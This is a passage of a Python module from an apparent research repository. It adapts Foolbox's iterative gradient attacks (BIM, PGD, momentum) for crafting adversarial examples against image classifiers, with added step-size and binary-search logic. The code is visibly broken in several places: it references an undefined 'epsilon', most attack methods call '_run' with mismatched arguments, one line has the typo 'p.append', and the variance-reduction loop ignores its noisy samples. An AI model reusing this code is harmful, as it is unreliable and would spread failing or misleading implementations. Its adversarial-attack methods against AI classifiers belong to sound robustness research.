noise, epsilon):\r\n raise NotImplementedError\r\n\r\n @abstractmethod\r\n def _check_distance(self, a):\r\n raise NotImplementedError\r\n\r\n def _get_mode_and_class(self, a):\r\n # determine if the attack is targeted or not\r\n target_class = a.target_class\r\n targeted = target_class is not None\r\n\r\n if targeted:\r\n class_ = target_class\r\n else:\r\n class_ = a.original_class\r\n return targeted, class_\r\n\r\n def _run(self, a, iterations, random_start, return_early, vr_or_not, scale, m, worthless, binary, RC, exp_step):\r\n if not a.has_gradient():\r\n warnings.warn('applied gradient-based attack to model that'\r\n ' does not provide gradients')\r\n return\r\n\r\n self._check_distance(a)\r\n\r\n a.evolutionary_doc = np.array([])\r\n\r\n min_, max_ = a.bounds()\r\n\r\n targeted, class_ = self._get_mode_and_class(a)\r\n\r\n #首先确定步长\r\n original = a.unperturbed.copy()\r\n\r\n temp_scale = 1 \r\n for scale_counter in range(1, 9999):\r\n temp_scale_x = np.clip(np.random.normal(loc=a.unperturbed, scale=temp_scale), min_, max_).astype(np.float32)\r\n logits, is_adversarial = a.forward_one(np.round(temp_scale_x))\r\n\r\n if a._Adversarial__best_adversarial is not None:\r\n a.evolutionary_doc = np.append(a.evolutionary_doc, l2_distance(a._Adversarial__best_adversarial, original))\r\n else:\r\n a.evolutionary_doc = np.append(a.evolutionary_doc, 80)\r\n\r\n if is_adversarial: #成功了,保存噪声幅度\r\n noise_r = temp_scale_x\r\n noise_l = original\r\n \r\n binary_counter = 0\r\n if binary: #选择进行二分\r\n for binary_counter in range(1, 9999):\r\n dist_r = l2_distance(np.round(noise_r), original)\r\n dist_l = l2_distance(np.round(noise_l), original)\r\n # print(\"dist_l, dist_r, estimate\", dist_l, dist_r, (0.9985 - 0.75)*dist_r - 0.25*dist_l)\r\n if binary_value_estimate(dist_l, dist_r, 0.9985): #说明值得\r\n logits, is_adversarial = a.forward_one(np.round((noise_r + noise_l)/2))\r\n if is_adversarial: #二分成功,出现新的更近的对抗样本\r\n noise_r = (noise_r + noise_l)/2\r\n else:\r\n noise_l = (noise_r + noise_l)/2\r\n\r\n if a._Adversarial__best_adversarial is not None:\r\n a.evolutionary_doc = np.append(a.evolutionary_doc, l2_distance(a._Adversarial__best_adversarial, original))\r\n else:\r\n a.evolutionary_doc = p.append(a.evolutionary_doc, 80)\r\n\r\n else: #不再值得了\r\n break\r\n \r\n stepsize = l2_distance(noise_r, original)/exp_step\r\n break\r\n else:\r\n temp_scale *= 1.5\r\n\r\n # print(\"temp_scale\", temp_scale)\r\n\r\n #目前已经用了scale_counter+binary_counter次的查询\r\n return self._run_one(a, stepsize, iterations-scale_counter-binary_counter, random_start, targeted, class_, return_early, vr_or_not, scale, m, l2_distance(temp_scale_x, original), worthless, RC)\r\n\r\n\r\n def _run_one(self, a, stepsize, iterations, random_start, targeted, class_, return_early, vr_or_not, scale, m, noise_g, worthless, RC):\r\n min_, max_ = a.bounds()\r\n s = max_ - min_\r\n\r\n \r\n\r\n original = a.unperturbed.copy()\r\n\r\n if random_start:\r\n # using uniform noise even if the perturbation clipping uses\r\n # a different norm because cleverhans does it the same way\r\n noise = np.random.uniform(\r\n -epsilon * s, epsilon * s, original.shape).astype(\r\n original.dtype)\r\n x = original + self._clip_perturbation(a, noise, epsilon)\r\n strict = False # because we don't enforce the bounds here\r\n else:\r\n x = original\r\n strict = True\r\n\r\n success = False\r\n\r\n if RC: #存在上山下山两条路径,进行初始化\r\n uphill_worthless_flag = False\r\n downhill_worthless_flag = False\r\n uphill_flag = True #上山标志物,True则上,否则下\r\n uphill_iterations = 0\r\n downhill_iterations = 0 #上山下山两个方向各走了多少步\r\n x_uphill = x.copy()\r\n x_downhill = x.copy() #上山下山两个维持的对抗样本\r\n uphill_abandon = False\r\n downhill_abandon = False #上山下山两个路径是否放弃\r\n else: #只存在一条路径,也就是上山路径\r\n uphill_worthless_flag = False\r\n x_uphill = x.copy()\r\n\r\n _ = 0\r\n for _ in range(iterations):\r\n if worthless: #进行价值判断\r\n if RC: #在上山/下山场景下进行价值判断\r\n if uphill_abandon and downhill_abandon: #两个方向都放弃了\r\n return success, iterations - uphill_iterations - downhill_iterations\r\n elif uphill_flag: #目前是上山阶段\r\n if uphill_iterations > 0: #已经不是第一次跑上山路径了\r\n uphill_worthless_flag = step_value_estimate(noise_g, l2_distance(x_uphill, original), 0.9985, uphill_iterations)\r\n if uphill_iterations > 0 and uphill_worthless_flag == True: #不值得继续算下去了\r\n uphill_abandon = True #放弃上山\r\n uphill_flag = False #开始下山\r\n continue\r\n elif uphill_flag == False: #目前是下山阶段\r\n if downhill_iterations > 0: #已经不是第一次跑下山路径了\r\n downhill_worthless_flag = step_value_estimate(noise_g, l2_distance(x_downhill, original), 0.9985, downhill_iterations)\r\n if downhill_iterations > 0 and downhill_worthless_flag == True: #不值得继续算下去了\r\n downhill_abandon = True #放弃下山\r\n uphill_flag = True #开始上山\r\n continue\r\n \r\n else: #没有上山/下山,单纯的上山路径\r\n if _ > 0: #不是第一步\r\n uphill_worthless_flag = step_value_estimate(noise_g, l2_distance(x_uphill, original), 0.9985, _)\r\n if _ > 0 and uphill_worthless_flag == True:\r\n #不值得继续算下去了\r\n return success, iterations - _\r\n\r\n #之后直接用x进行运算\r\n if RC:\r\n if uphill_flag: #目前是上山阶段\r\n x = x_uphill \r\n else: #目前是下山阶段\r\n x = x_downhill\r\n else: #没有上下山的事情\r\n x = x_uphill\r\n\r\n\r\n #使用vr-IGSM来平均梯度\r\n if vr_or_not:\r\n avg_gradient = 0\r\n for m_counter in range(m):\r\n temp_x = np.clip(np.random.normal(loc=x, scale=scale), min_, max_).astype(np.float32)\r\n temp_x.dtype = \"float32\"\r\n\r\n gradient = self._gradient(a, x, class_, strict=strict)\r\n avg_gradient += gradient\r\n \r\n gradient = avg_gradient/m\r\n else:\r\n #不需要vr-IGSM操作\r\n gradient = self._gradient(a, x, class_, strict=strict)\r\n\r\n # non-strict only for the first call and\r\n # only if random_start is True\r\n strict = True\r\n if targeted:\r\n gradient = -gradient\r\n\r\n # untargeted: gradient ascent on cross-entropy to original class\r\n # targeted: gradient descent on cross-entropy to target class\r\n \r\n if RC and uphill_flag == False and downhill_iterations == 0: \r\n #走到这里,如果使用上下山,且正在下山,且目前是第一步,则进行一步下山\r\n gradient = -gradient\r\n\r\n\r\n x = x + stepsize * gradient\r\n\r\n\r\n x = np.clip(x, min_, max_)\r\n\r\n logits, is_adversarial = a.forward_one(np.round(x))\r\n\r\n if a._Adversarial__best_adversarial is not None:\r\n a.evolutionary_doc = np.append(a.evolutionary_doc, l2_distance(a._Adversarial__best_adversarial, original))\r\n else:\r\n a.evolutionary_doc = np.append(a.evolutionary_doc, 80)\r\n\r\n # #FIXME\r\n # #查看替代模型与目标模型交叉熵变化\r\n # backward_logits = a.backward_model_predictions(np.round(x))\r\n # target_ce = crossentropy(a.original_class, logits)\r\n # source_ce = crossentropy(a.original_class, backward_logits)\r\n # print(\"target_cross_entropy, source_cross_entropy, distance\", target_ce, source_ce, l2_distance(np.round(x), original))\r\n if logging.getLogger().isEnabledFor(logging.DEBUG):\r\n if targeted:\r\n ce = crossentropy(a.original_class, logits)\r\n logging.debug('crossentropy to {} is {}'.format(\r\n a.original_class, ce))\r\n ce = crossentropy(class_, logits)\r\n logging.debug('crossentropy to {} is {}'.format(class_, ce))\r\n if is_adversarial:\r\n if return_early:\r\n print(\"final_step_size, iteration\", stepsize, _)\r\n return True, iterations - _ - 1\r\n else:\r\n success = True\r\n\r\n else: #如果没有成功,且正在上下山,则更新x_uphill和x_downhill\r\n if RC:\r\n if uphill_flag: #目前是上山阶段\r\n x_uphill = x\r\n uphill_iterations += 1\r\n \r\n elif uphill_flag == False: #目前是下山阶段\r\n x_downhill = x\r\n downhill_iterations += 1\r\n uphill_flag = (uphill_flag == False) #转换上/下山\r\n else:\r\n x_uphill = x\r\n \r\n #如果到最后也没成功\r\n if RC:\r\n return success, iterations - uphill_iterations - downhill_iterations\r\n else: \r\n return success, iterations - _ - 1\r\n\r\n\r\nclass LinfinityGradientMixin(object):\r\n def _gradient(self, a, x, class_, strict=True):\r\n gradient = a.gradient_one(x, class_, strict=strict)\r\n gradient = np.sign(gradient)\r\n min_, max_ = a.bounds()\r\n gradient = (max_ - min_) * gradient\r\n return gradient\r\n\r\n\r\n\r\nclass L1GradientMixin(object):\r\n def _gradient(self, a, x, class_, strict=True):\r\n gradient = a.gradient_one(x, class_, strict=strict)\r\n # using mean to make range of epsilons comparable to Linf\r\n gradient = gradient / np.mean(np.abs(gradient))\r\n min_, max_ = a.bounds()\r\n gradient = (max_ - min_) * gradient\r\n return gradient\r\n\r\n\r\nclass L2GradientMixin(object):\r\n def _gradient(self, a, x, class_, strict=True):\r\n gradient = a.gradient_one(x, class_, strict=strict)\r\n # using mean to make range of epsilons comparable to Linf\r\n\r\n # print(np.max(max(1e-12, np.mean(np.square(gradient)))))\r\n # print(np.min(max(1e-12, np.mean(np.square(gradient)))))\r\n gradient = gradient / np.sqrt(max(1e-12, np.sum(np.square(gradient))))\r\n min_, max_ = a.bounds()\r\n gradient = (max_ - min_) * gradient\r\n return gradient\r\n\r\n\r\nclass LinfinityClippingMixin(object):\r\n def _clip_perturbation(self, a, perturbation, epsilon):\r\n min_, max_ = a.bounds()\r\n s = max_ - min_\r\n clipped = np.clip(perturbation, -epsilon * s, epsilon * s)\r\n return clipped\r\n\r\n\r\nclass L1ClippingMixin(object):\r\n def _clip_perturbation(self, a, perturbation, epsilon):\r\n # using mean to make range of epsilons comparable to Linf\r\n norm = np.mean(np.abs(perturbation))\r\n norm = max(1e-12, norm) # avoid divsion by zero\r\n min_, max_ = a.bounds()\r\n s = max_ - min_\r\n # clipping, i.e. only decreasing norm\r\n factor = min(1, epsilon * s / norm)\r\n return perturbation * factor\r\n\r\n\r\nclass L2ClippingMixin(object):\r\n def _clip_perturbation(self, a, perturbation, epsilon):\r\n # using mean to make range of epsilons comparable to Linf\r\n norm = np.sqrt(np.mean(np.square(perturbation)))\r\n norm = max(1e-12, norm) # avoid divsion by zero\r\n min_, max_ = a.bounds()\r\n s = max_ - min_\r\n # clipping, i.e. only decreasing norm\r\n factor = min(1, epsilon * s / norm)\r\n return perturbation * factor\r\n\r\n\r\nclass LinfinityDistanceCheckMixin(object):\r\n def _check_distance(self, a):\r\n if not isinstance(a.distance, distances.Linfinity):\r\n logging.warning('Running an attack that tries to minimize the'\r\n ' Linfinity norm of the perturbation without'\r\n ' specifying foolbox.distances.Linfinity as'\r\n ' the distance metric might lead to suboptimal'\r\n ' results.')\r\n\r\n\r\nclass L1DistanceCheckMixin(object):\r\n def _check_distance(self, a):\r\n if not isinstance(a.distance, distances.MAE):\r\n logging.warning('Running an attack that tries to minimize the'\r\n ' L1 norm of the perturbation without'\r\n ' specifying foolbox.distances.MAE as'\r\n ' the distance metric might lead to suboptimal'\r\n ' results.')\r\n\r\n\r\nclass L2DistanceCheckMixin(object):\r\n def _check_distance(self, a):\r\n if not isinstance(a.distance, distances.MSE):\r\n logging.warning('Running an attack that tries to minimize the'\r\n ' L2 norm of the perturbation without'\r\n ' specifying foolbox.distances.MSE as'\r\n ' the distance metric might lead to suboptimal'\r\n ' results.')\r\n\r\n\r\nclass LinfinityBasicIterativeAttack(\r\n LinfinityGradientMixin,\r\n LinfinityClippingMixin,\r\n LinfinityDistanceCheckMixin,\r\n IterativeProjectedGradientBaseAttack):\r\n\r\n \"\"\"The Basic Iterative Method introduced in [1]_.\r\n\r\n This attack is also known as Projected Gradient\r\n Descent (PGD) (without random start) or FGMS^k.\r\n\r\n References\r\n ----------\r\n .. [1] Alexey Kurakin, Ian Goodfellow, Samy Bengio,\r\n \"Adversarial examples in the physical world\",\r\n https://arxiv.org/abs/1607.02533\r\n\r\n .. seealso:: :class:`ProjectedGradientDescentAttack`\r\n\r\n \"\"\"\r\n\r\n @call_decorator\r\n def __call__(self, input_or_adv, label=None, unpack=True,\r\n iterations=10,\r\n random_start=False,\r\n return_early=True):\r\n \"\"\"Simple iterative gradient-based attack known as\r\n Basic Iterative Method, Projected Gradient Descent or FGSM^k.\r\n\r\n Parameters\r\n ----------\r\n input_or_adv : `numpy.ndarray` or :class:`Adversarial`\r\n The original, unperturbed input as a `numpy.ndarray` or\r\n an :class:`Adversarial` instance.\r\n label : int\r\n The reference label of the original input. Must be passed\r\n if `a` is a `numpy.ndarray`, must not be passed if `a` is\r\n an :class:`Adversarial` instance.\r\n unpack : bool\r\n If true, returns the adversarial input, otherwise returns\r\n the Adversarial object.\r\n binary_search : bool or int\r\n Whether to perform a binary search over epsilon and stepsize,\r\n keeping their ratio constant and using their values to start\r\n the search. If False, hyperparameters are not optimized.\r\n Can also be an integer, specifying the number of binary\r\n search steps (default 20).\r\n epsilon : float\r\n Limit on the perturbation size; if binary_search is True,\r\n this value is only for initialization and automatically\r\n adapted.\r\n stepsize : float\r\n Step size for gradient descent; if binary_search is True,\r\n this value is only for initialization and automatically\r\n adapted.\r\n iterations : int\r\n Number of iterations for each gradient descent run.\r\n random_start : bool\r\n Start the attack from a random point rather than from the\r\n original input.\r\n return_early : bool\r\n Whether an individual gradient descent run should stop as\r\n soon as an adversarial is found.\r\n \"\"\"\r\n\r\n a = input_or_adv\r\n del input_or_adv\r\n del label\r\n del unpack\r\n\r\n assert epsilon > 0\r\n\r\n self._run(a, iterations, random_start, return_early)\r\n\r\n\r\nBasicIterativeMethod = LinfinityBasicIterativeAttack\r\nBIM = BasicIterativeMethod\r\n\r\n\r\nclass L1BasicIterativeAttack(\r\n L1GradientMixin,\r\n L1ClippingMixin,\r\n L1DistanceCheckMixin,\r\n IterativeProjectedGradientBaseAttack):\r\n\r\n \"\"\"Modified version of the Basic Iterative Method\r\n that minimizes the L1 distance.\r\n\r\n .. seealso:: :class:`LinfinityBasicIterativeAttack`\r\n\r\n \"\"\"\r\n\r\n @call_decorator\r\n def __call__(self, input_or_adv, label=None, unpack=True,\r\n epsilon=0.3,\r\n stepsize=0.05,\r\n iterations=10,\r\n random_start=False,\r\n return_early=True):\r\n \"\"\"Simple iterative gradient-based attack known as\r\n Basic Iterative Method, Projected Gradient Descent or FGSM^k.\r\n\r\n Parameters\r\n ----------\r\n input_or_adv : `numpy.ndarray` or :class:`Adversarial`\r\n The original, unperturbed input as a `numpy.ndarray` or\r\n an :class:`Adversarial` instance.\r\n label : int\r\n The reference label of the original input. Must be passed\r\n if `a` is a `numpy.ndarray`, must not be passed if `a` is\r\n an :class:`Adversarial` instance.\r\n unpack : bool\r\n If true, returns the adversarial input, otherwise returns\r\n the Adversarial object.\r\n binary_search : bool or int\r\n Whether to perform a binary search over epsilon and stepsize,\r\n keeping their ratio constant and using their values to start\r\n the search. If False, hyperparameters are not optimized.\r\n Can also be an integer, specifying the number of binary\r\n search steps (default 20).\r\n epsilon : float\r\n Limit on the perturbation size; if binary_search is True,\r\n this value is only for initialization and automatically\r\n adapted.\r\n stepsize : float\r\n Step size for gradient descent; if binary_search is True,\r\n this value is only for initialization and automatically\r\n adapted.\r\n iterations : int\r\n Number of iterations for each gradient descent run.\r\n random_start : bool\r\n Start the attack from a random point rather than from the\r\n original input.\r\n return_early : bool\r\n Whether an individual gradient descent run should stop as\r\n soon as an adversarial is found.\r\n \"\"\"\r\n\r\n a = input_or_adv\r\n del input_or_adv\r\n del label\r\n del unpack\r\n\r\n assert epsilon > 0\r\n\r\n self._run(a, epsilon, stepsize, iterations,\r\n random_start, return_early)\r\n\r\n\r\nclass L2BasicIterativeAttack(\r\n L2GradientMixin,\r\n L2ClippingMixin,\r\n L2DistanceCheckMixin,\r\n IterativeProjectedGradientBaseAttack):\r\n\r\n \"\"\"Modified version of the Basic Iterative Method\r\n that minimizes the L2 distance.\r\n\r\n .. seealso:: :class:`LinfinityBasicIterativeAttack`\r\n\r\n \"\"\"\r\n\r\n @call_decorator\r\n def __call__(self, input_or_adv, label=None, unpack=False,\r\n epsilon=0.3,\r\n stepsize=0.05,\r\n iterations=10,\r\n random_start=False,\r\n return_early=True,\r\n vr_or_not=False,\r\n scale=2,\r\n m=1,\r\n worthless=False,\r\n binary=False,\r\n RC=False,\r\n exp_step=10):\r\n \"\"\"Simple iterative gradient-based attack known as\r\n Basic Iterative Method, Projected Gradient Descent or FGSM^k.\r\n\r\n Parameters\r\n ----------\r\n input_or_adv : `numpy.ndarray` or :class:`Adversarial`\r\n The original, unperturbed input as a `numpy.ndarray` or\r\n an :class:`Adversarial` instance.\r\n label : int\r\n The reference label of the original input. Must be passed\r\n if `a` is a `numpy.ndarray`, must not be passed if `a` is\r\n an :class:`Adversarial` instance.\r\n unpack : bool\r\n If true, returns the adversarial input, otherwise returns\r\n the Adversarial object.\r\n binary_search : bool or int\r\n Whether to perform a binary search over epsilon and stepsize,\r\n keeping their ratio constant and using their values to start\r\n the search. If False, hyperparameters are not optimized.\r\n Can also be an integer, specifying the number of binary\r\n search steps (default 20).\r\n epsilon : float\r\n Limit on the perturbation size; if binary_search is True,\r\n this value is only for initialization and automatically\r\n adapted.\r\n stepsize : float\r\n Step size for gradient descent; if binary_search is True,\r\n this value is only for initialization and automatically\r\n adapted.\r\n iterations : int\r\n Number of iterations for each gradient descent run.\r\n random_start : bool\r\n Start the attack from a random point rather than from the\r\n original input.\r\n return_early : bool\r\n Whether an individual gradient descent run should stop as\r\n soon as an adversarial is found.\r\n \"\"\"\r\n\r\n a = input_or_adv\r\n del input_or_adv\r\n del label\r\n del unpack\r\n\r\n assert epsilon > 0\r\n\r\n self._run(a, iterations, random_start, return_early, vr_or_not, scale, m, worthless, binary, RC, exp_step)\r\n\r\n\r\nclass ProjectedGradientDescentAttack(\r\n LinfinityGradientMixin,\r\n LinfinityClippingMixin,\r\n LinfinityDistanceCheckMixin,\r\n IterativeProjectedGradientBaseAttack):\r\n\r\n \"\"\"The Projected Gradient Descent Attack\r\n introduced in [1]_ without random start.\r\n\r\n When used without a random start, this attack\r\n is also known as Basic Iterative Method (BIM)\r\n or FGSM^k.\r\n\r\n References\r\n ----------\r\n .. [1] Aleksander Madry, Aleksandar Makelov, Ludwig Schmidt,\r\n Dimitris Tsipras, Adrian Vladu, \"Towards Deep Learning\r\n Models Resistant to Adversarial Attacks\",\r\n https://arxiv.org/abs/1706.06083\r\n\r\n .. seealso::\r\n\r\n :class:`LinfinityBasicIterativeAttack` and\r\n :class:`RandomStartProjectedGradientDescentAttack`\r\n\r\n \"\"\"\r\n\r\n @call_decorator\r\n def __call__(self, input_or_adv, label=None, unpack=True,\r\n epsilon=0.3,\r\n stepsize=0.01,\r\n iterations=40,\r\n random_start=False,\r\n return_early=True):\r\n \"\"\"Simple iterative gradient-based attack known as\r\n Basic Iterative Method, Projected Gradient Descent or FGSM^k.\r\n\r\n Parameters\r\n ----------\r\n input_or_adv : `numpy.ndarray` or :class:`Adversarial`\r\n The original, unperturbed input as a `numpy.ndarray` or\r\n an :class:`Adversarial` instance.\r\n label : int\r\n The reference label of the original input. Must be passed\r\n if `a` is a `numpy.ndarray`, must not be passed if `a` is\r\n an :class:`Adversarial` instance.\r\n unpack : bool\r\n If true, returns the adversarial input, otherwise returns\r\n the Adversarial object.\r\n binary_search : bool or int\r\n Whether to perform a binary search over epsilon and stepsize,\r\n keeping their ratio constant and using their values to start\r\n the search. If False, hyperparameters are not optimized.\r\n Can also be an integer, specifying the number of binary\r\n search steps (default 20).\r\n epsilon : float\r\n Limit on the perturbation size; if binary_search is True,\r\n this value is only for initialization and automatically\r\n adapted.\r\n stepsize : float\r\n Step size for gradient descent; if binary_search is True,\r\n this value is only for initialization and automatically\r\n adapted.\r\n iterations : int\r\n Number of iterations for each gradient descent run.\r\n random_start : bool\r\n Start the attack from a random point rather than from the\r\n original input.\r\n return_early : bool\r\n Whether an individual gradient descent run should stop as\r\n soon as an adversarial is found.\r\n \"\"\"\r\n\r\n a = input_or_adv\r\n del input_or_adv\r\n del label\r\n del unpack\r\n\r\n assert epsilon > 0\r\n\r\n self._run(a, epsilon, stepsize, iterations,\r\n random_start, return_early)\r\n\r\n\r\nProjectedGradientDescent = ProjectedGradientDescentAttack\r\nPGD = ProjectedGradientDescent\r\n\r\n\r\nclass RandomStartProjectedGradientDescentAttack(\r\n LinfinityGradientMixin,\r\n LinfinityClippingMixin,\r\n LinfinityDistanceCheckMixin,\r\n IterativeProjectedGradientBaseAttack):\r\n\r\n \"\"\"The Projected Gradient Descent Attack\r\n introduced in [1]_ with random start.\r\n\r\n References\r\n ----------\r\n .. [1] Aleksander Madry, Aleksandar Makelov, Ludwig Schmidt,\r\n Dimitris Tsipras, Adrian Vladu, \"Towards Deep Learning\r\n Models Resistant to Adversarial Attacks\",\r\n https://arxiv.org/abs/1706.06083\r\n\r\n .. seealso:: :class:`ProjectedGradientDescentAttack`\r\n\r\n \"\"\"\r\n\r\n @call_decorator\r\n def __call__(self, input_or_adv, label=None, unpack=True,\r\n epsilon=0.3,\r\n stepsize=0.01,\r\n iterations=40,\r\n random_start=True,\r\n return_early=True):\r\n \"\"\"Simple iterative gradient-based attack known as\r\n Basic Iterative Method, Projected Gradient Descent or FGSM^k.\r\n\r\n Parameters\r\n ----------\r\n input_or_adv : `numpy.ndarray` or :class:`Adversarial`\r\n The original, unperturbed input as a `numpy.ndarray` or\r\n an :class:`Adversarial` instance.\r\n label : int\r\n The reference label of the original input. Must be passed\r\n if `a` is a `numpy.ndarray`, must not be passed if `a` is\r\n an :class:`Adversarial` instance.\r\n unpack : bool\r\n If true, returns the adversarial input, otherwise returns\r\n the Adversarial object.\r\n binary_search : bool or int\r\n Whether to perform a binary search over epsilon and stepsize,\r\n keeping their ratio constant and using their values to start\r\n the search. If False, hyperparameters are not optimized.\r\n Can also be an integer, specifying the number of binary\r\n search steps (default 20).\r\n epsilon : float\r\n Limit on the perturbation size; if binary_search is True,\r\n this value is only for initialization and automatically\r\n adapted.\r\n stepsize : float\r\n Step size for gradient descent; if binary_search is True,\r\n this value is only for initialization and automatically\r\n adapted.\r\n iterations : int\r\n Number of iterations for each gradient descent run.\r\n random_start : bool\r\n Start the attack from a random point rather than from the\r\n original input.\r\n return_early : bool\r\n Whether an individual gradient descent run should stop as\r\n soon as an adversarial is found.\r\n \"\"\"\r\n\r\n a = input_or_adv\r\n del input_or_adv\r\n del label\r\n del unpack\r\n\r\n assert epsilon > 0\r\n\r\n self._run(a, epsilon, stepsize, iterations,\r\n random_start, return_early)\r\n\r\n\r\nRandomProjectedGradientDescent = RandomStartProjectedGradientDescentAttack\r\nRandomPGD = RandomProjectedGradientDescent\r\n\r\n\r\nclass MomentumIterativeAttack(\r\n LinfinityClippingMixin,\r\n LinfinityDistanceCheckMixin,\r\n IterativeProjectedGradientBaseAttack):\r\n\r\n \"\"\"The Momentum Iterative Method attack\r\n introduced in [1]_. It's like the Basic\r\n Iterative Method or Projected Gradient\r\n Descent except that it uses momentum.\r\n\r\n References\r\n ----------\r\n .. [1] Yinpeng Dong, Fangzhou Liao, Tianyu Pang, Hang Su,\r\n Jun Zhu, Xiaolin Hu, Jianguo Li, \"Boosting Adversarial\r\n Attacks with Momentum\",\r\n https://arxiv.org/abs/1710.06081\r\n\r\n \"\"\"\r\n\r\n def _gradient(self, a, x, class_, strict=True):\r\n # get current gradient\r\n gradient = a.gradient_one(x, class_, strict=strict)\r\n gradient = gradient / max(1e-12, np.mean(np.abs(gradient)))\r\n\r\n # combine with history of gradient as new history\r\n self._momentum_history = self._decay_factor * self._momentum_history + gradient\r\n\r\n # use history\r\n gradient = self._momentum_history\r\n gradient = np.sign(gradient)\r\n min_, max_ = a.bounds()\r\n gradient = (max_ - min_) * gradient\r\n return gradient\r\n\r\n def _run_one(self, *args, **kwargs):\r\n # reset momentum history every time we restart\r\n # gradient descent\r\n self._momentum_history = 0\r\n return super(MomentumIterativeAttack, self)._run_one(*args, **kwargs)\r\n\r\n @call_decorator\r\n def __call__(self, input_or_adv, label=None, unpack=True,\r\n epsilon=0.3,\r\n stepsize=0.06,\r\n iterations=10,\r\n decay_factor=1.0,\r\n random_start=False,\r\n return_early=True):\r\n \"\"\"Momentum-based iterative gradient attack known as\r\n Momentum Iterative Method.\r\n\r\n Parameters\r\n ----------\r\n input_or_adv : `numpy.ndarray` or :class:`Adversarial`\r\n The original, unperturbed input as a `numpy.ndarray` or\r\n an :class:`Adversarial` instance.\r\n label : int\r\n The reference label of the original input. Must be passed\r\n if `a` is a `numpy.ndarray`, must not be passed if `a` is\r\n an :class:`Adversarial` instance.\r\n unpack : bool\r\n If true, returns the adversarial input, otherwise returns\r\n the Adversarial object.\r\n binary_search : bool\r\n Whether to perform a binary search over epsilon and stepsize,\r\n keeping their ratio constant and using their values to start\r\n the search. If False, hyperparameters are not optimized.\r\n Can also be an integer, specifying the number of binary\r\n search steps (default 20).\r\n epsilon : float\r\n Limit on the perturbation size; if binary_search is True,\r\n this value is only for initialization and automatically\r\n adapted.\r\n stepsize : float\r\n Step size for gradient descent; if binary_search is True,\r\n this value is only for initialization and automatically\r\n adapted.\r\n iterations : int\r\n Number of iterations for each gradient descent run.\r\n decay_factor : float\r\n Decay factor used by the momentum term.\r\n random_start : bool\r\n Start the attack from a random point rather than from the\r\n original input.\r\n return_early : bool\r\n Whether an individual gradient descent run should stop as\r\n soon as an adversarial is found.\r\n \"\"\"\r\n a = input_or_adv\r\n del input_or_adv\r\n del label\r\n del unpack\r\n\r\n assert epsilon > 0\r\n\r\n self._decay_factor = decay_factor\r\n\r\n self._run(a, epsilon, stepsize, iterations,\r\n random_start, return_early)\r\n\r\n\r\nMomentumIterativeMethod = MomentumIterativeAttack\r\n", "repo_name": "shiyuchengTJU/CISA", "sub_path": "my_attacks/gaussian_iterative_projected_gradient.py", "file_name": "gaussian_iterative_projected_gradient.py", "file_ext": "py", "file_size_in_byte": 35585, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 10, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.sum", "line_number": 18, "usage_type": "call"}, {"api_name": "foolbox.attacks.base.Attack", "line_number": 56, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 66, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 70, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 74, "usage_type": "name"}, {"api_name": "warnings.warn", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 108, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 108, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 108, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 108, "usage_type": "attribute"}, {"api_name": "numpy.round", "line_number": 109, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 127, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.random.uniform", "line_number": 163, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 163, "usage_type": "attribute"}, {"api_name": "numpy.clip", "line_number": 230, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 230, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 230, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 230, "usage_type": "attribute"}, {"api_name": "numpy.clip", "line_number": 258, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 260, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 263, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 265, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 273, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 273, "usage_type": "attribute"}, {"api_name": "foolbox.utils.crossentropy", "line_number": 275, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 276, "usage_type": "call"}, {"api_name": "foolbox.utils.crossentropy", "line_number": 278, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 279, "usage_type": "call"}, {"api_name": "numpy.sign", "line_number": 310, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 321, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 321, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 334, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 334, "usage_type": "call"}, {"api_name": "numpy.square", "line_number": 334, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 344, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 351, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 351, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 363, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 363, "usage_type": "call"}, {"api_name": "numpy.square", "line_number": 363, "usage_type": "call"}, {"api_name": "foolbox.distances.Linfinity", "line_number": 374, "usage_type": "attribute"}, {"api_name": "foolbox.distances", "line_number": 374, "usage_type": "name"}, {"api_name": "logging.warning", "line_number": 375, "usage_type": "call"}, {"api_name": "foolbox.distances.MAE", "line_number": 384, "usage_type": "attribute"}, {"api_name": "foolbox.distances", "line_number": 384, "usage_type": "name"}, {"api_name": "logging.warning", "line_number": 385, "usage_type": "call"}, {"api_name": "foolbox.distances.MSE", "line_number": 394, "usage_type": "attribute"}, {"api_name": "foolbox.distances", "line_number": 394, "usage_type": "name"}, {"api_name": "logging.warning", "line_number": 395, "usage_type": "call"}, {"api_name": "foolbox.attacks.base.call_decorator", "line_number": 423, "usage_type": "name"}, {"api_name": 